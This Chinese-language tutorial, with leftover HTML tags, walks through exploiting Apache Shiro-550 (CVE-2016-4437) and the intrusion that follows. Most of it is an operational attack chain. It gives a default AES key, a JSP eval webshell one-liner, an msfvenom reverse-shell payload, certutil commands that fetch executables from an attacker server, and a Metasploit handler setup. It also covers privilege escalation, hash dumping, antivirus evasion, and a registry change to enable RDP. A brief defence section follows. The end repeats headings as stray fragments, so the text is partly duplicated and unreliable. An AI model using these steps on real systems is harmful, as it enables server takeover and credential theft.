Shiro-550漏洞利用与内网渗透实战教学文档<\/h1>

一、Shiro-550漏洞原理分析<\/h2>

1.1 漏洞背景<\/h3>
Apache Shiro是一个Java安全框架，提供认证、授权、加密和会话管理等功能。Shiro-550(CVE-2016-4437)是一个严重的反序列化漏洞，影响版本1.2.5及以下。<\/p>

1.2 漏洞原理<\/h3>

Shiro框架在登录时，如果勾选了"RememberMe"功能，关闭浏览器再次访问时无需再次登录，此时cookie中会增加一个rememberMe字段，其值经过以下处理：<\/p>

序列化<\/li>
AES加密<\/li>

Base64编码<\/li> <\/ol>

后端处理过程为：<\/p>

Base64解码<\/li>
AES解密<\/li>

反序列化<\/li> <\/ol>

1.3 关键漏洞点<\/h3>

硬编码密钥<\/strong>：AES加密使用的密钥被硬编码在程序中，攻击者可以获取默认密钥<\/li>
IV值泄露<\/strong>：AES加密后，IV值会被放在密文前16字节，通过Base64解码可获取<\/li>

反序列化漏洞<\/strong>：解密后的数据会被反序列化，可构造恶意对象触发RCE<\/li> <\/ul>
1.4 默认密钥示例<\/h3>
常见默认密钥：<\/p>
kPH+bIxk5D2deZiIxcaaaA== <\/code><\/pre> 二、漏洞检测与利用<\/h2> 2.1 指纹识别<\/h3> 使用工具识别Shiro框架：<\/p> Ehole3.0重构版<\/li> 手动检测：添加rememberMe字段，观察响应是否包含rememberMe=deleteMe<\/code><\/li> <\/ul> <\/li> 检测登录功能：<\/p> 检查是否有"记住我"功能<\/li> 抓包查看是否有rememberMe字段<\/li> <\/ul> <\/li> <\/ol> 2.2 密钥碰撞<\/h3> 使用工具进行密钥碰撞：<\/p> 准备常见密钥字典<\/li> 使用ShiroExploit等工具进行批量测试<\/li> 成功碰撞出有效密钥<\/li> <\/ol> 2.3 命令执行<\/h3> 利用步骤：<\/p> 构造恶意序列化对象<\/li> 使用获取的密钥和IV进行AES加密<\/li> 将IV值放在密文前16字节<\/li> Base64编码后替换rememberMe字段值<\/li> 发送请求触发RCE<\/li> <\/ol> 三、权限维持与内网渗透<\/h2> 3.1 Webshell上传<\/h3> 尝试直接写入JSP Webshell：<\/p> echo ^<%eval request("cmd");%^>>yl_test.jsp <\/code><\/pre> 可能被杀毒软件拦截<\/li> <\/ul> <\/li> 使用BCEL进行免杀：<\/p> 构造BCEL格式的Webshell<\/li> 上传到非默认目录避免检测<\/li> <\/ul> <\/li> <\/ol> 3.2 MSF上线<\/h3> 生成Payload：<\/p> msfvenom -p windows\/x64\/meterpreter\/reverse_tcp lhost=xxxx lport=1234 -f c >1234.c <\/code><\/pre> <\/li> 免杀处理：<\/p> 使用分离免杀技术生成test.exe和test.txt<\/li> 通过HTTP服务提供下载<\/li> <\/ul> <\/li> 目标机器执行：<\/p> certutil.exe -urlcache -split -f http:\/\/xxx:1111\/test.txt certutil.exe -urlcache -split -f http:\/\/xxx:1111\/test.exe <\/code><\/pre> <\/li> MSF监听设置：<\/p> use exploit\/multi\/handler set payload windows\/x64\/meterpreter\/reverse_tcp set lhost xxx set lport 1234 run <\/code><\/pre> <\/li> <\/ol> 3.3 信息收集<\/h3> 系统信息：<\/p> systeminfo <\/code><\/pre> <\/li> 网络信息：<\/p> ipconfig \/all netstat -ano <\/code><\/pre> <\/li> 用户信息：<\/p> net user whoami \/all <\/code><\/pre> <\/li> 进程信息：<\/p> tasklist \/svc <\/code><\/pre> <\/li> <\/ol> 3.4 权限提升<\/h3> 获取SYSTEM权限：<\/p> getsystem <\/code><\/pre> <\/li> 密码提取：<\/p> 导出NTLM Hash<\/li> 使用工具破解<\/li> <\/ul> <\/li> <\/ol> 3.5 远程桌面连接<\/h3> 查找RDP端口：<\/p> tasklist \/svc | findstr "svchost.exe" netstat -ano | findstr "PID" <\/code><\/pre> <\/li> 解决连接问题：<\/p> 修改注册表解决CredSSP加密Oracle修复：<\/li> <\/ul> New-Item -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name CredSSP -Force New-Item -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP -Name Parameters -Force Get-Item -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters | New-ItemProperty -Name AllowEncryptionOracle -Value 2 -PropertyType DWORD -Force <\/code><\/pre> 使用Remmina等第三方工具连接<\/li> <\/ul> <\/li> <\/ol> 四、防御建议<\/h2> 4.1 针对Shiro-550漏洞<\/h3> 升级到最新版本<\/li> 修改默认密钥为随机强密钥<\/li> 禁用RememberMe功能或实现自定义加密逻辑<\/li> <\/ol> 4.2 系统安全加固<\/h3> 安装杀毒软件并保持更新<\/li> 限制不必要的网络端口<\/li> 实施最小权限原则<\/li> 定期审计系统日志<\/li> <\/ol> 4.3 应急响应<\/h3> 发现入侵后立即隔离系统<\/li> 重置所有凭据<\/li> 检查系统后门<\/li> 分析攻击路径并修补漏洞<\/li> <\/ol> 五、总结<\/h2> 本案例展示了从Shiro-550漏洞发现到内网渗透的完整过程，涉及：<\/p> 漏洞检测与利用<\/li> Webshell上传与免杀<\/li> 权限维持与提升<\/li> 内网信息收集<\/li> 远程控制技术<\/li> <\/ol> 通过此案例，安全人员可以了解攻击者的完整攻击链，从而更好地防御此类攻击。<\/p>

Shiro-550漏洞利用与内网渗透实战教学文档<\/h1>

一、Shiro-550漏洞原理分析<\/h2>

1.1 漏洞背景<\/h3> Apache Shiro是一个Java安全框架，提供认证、授权、加密和会话管理等功能。Shiro-550(CVE-2016-4437)是一个严重的反序列化漏洞，影响版本1.2.5及以下。<\/p>

二、漏洞检测与利用<\/h2>

三、权限维持与内网渗透<\/h2>

四、防御建议<\/h2>

1.1 漏洞背景<\/h3>
Apache Shiro是一个Java安全框架，提供认证、授权、加密和会话管理等功能。Shiro-550(CVE-2016-4437)是一个严重的反序列化漏洞，影响版本1.2.5及以下。<\/p>